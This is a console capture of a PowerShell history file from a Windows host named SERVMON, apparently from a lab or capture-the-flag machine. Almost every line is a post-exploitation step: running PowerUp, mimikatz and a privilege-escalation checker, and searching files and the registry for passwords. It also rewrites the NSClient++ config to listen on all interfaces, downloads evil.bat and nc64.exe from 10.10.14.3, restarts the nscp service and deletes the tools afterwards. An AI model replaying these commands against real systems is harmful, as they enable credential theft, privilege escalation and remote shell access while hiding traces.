PS history file: C:\Users\Nadine\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt

nadine@SERVMON C:\Users\Nadine\AppData\Local\Temp>type C:\Users\Nadine\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt

Invoke-WebRequest http://192.168.1.110/Windows/windows-
Invoke-WebRequest http://192.168.1.110/Windows/windows-privesc-check.exe -OutFile $env:TEMP\windows-privesc-check.exe
cd
cd ..
dir
cd .\Nadine\
dir
cd .\Desktop\
dir
.\PowerUp.ps1
.\windows-privesc-check.exe
.\windows-privesc-check.exe --dump
.\windows-privesc-check.exe --dump -h
.\windows-privesc-check.exe --audit -a -o wpc-report
dir
cd .\mimikatz\
dir
cd .\x64\
dir
.\mimikatz.exe
cd ..
dir
del .\PowerUp.ps1
del .\mimikatz\
dir
cd windo*
del .\windows-privesc-check.exe
del .\windows-privesc-check2.exe
dir
python
systeminfo
whoami
net users
findstr /si password *.txt
findstr /si password *.xml
findstr /si password *.ini
dir /s *pass* == *cred* == *vnc* == *.config*
findstr /spin "password" *.*
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon"
reg query HKLM /f password /t REG_SZ /s
netstat -ano
netstat -putona
netstat -ano
c:
cd ..
dir
cd .\inetpub\
dir
cd .\ftproot\
dir
cd ..
dir
cd '.\Program Files\'
dir
cd .\NSClient++\
dir
type .\nsclient.ini
curl
$file = '.\nsclient.ini'
$find = '127.0.0.1'
$replace = '0.0.0.0'
(Get-Content $file).replace($find, $replace) | Set-Content $file
type .\nsclient.ini
netstat -ano
ping
shutdown /r
ssh
ssh test@192.168.220.11
ssh jsanz-ma@192.168.220.11
ssh jsanz-ma@10.10.0.14
nmap
wget 10.10.14.3/evil.bat -o evil./bat
wget 10.10.14.3/evil.bat -o evil.bat
wget 10.10.14.3:81/evil.bat -o evil.bat
wget 10.10.14.3:81/nc64.exe -o nc64.exe
sc stop nscp
sc start nscp
dir
exit
wget 10.10.14.3:81/evil.bat
wget 10.10.14.3:81/evil.bat -o evil.bat
wget 10.10.14.3:81/nc64.exe -o nc64.exe
dir
exit
cd C:/Temp
wget 10.10.14.3/nc64.exe -o nc64.exe
wget 10.10.14.3/evil.bat -o evil.bat
exit
rm .\evil.bat
rm .\nc64.exe
dir
del .\nc64.exe
ls -la
dir
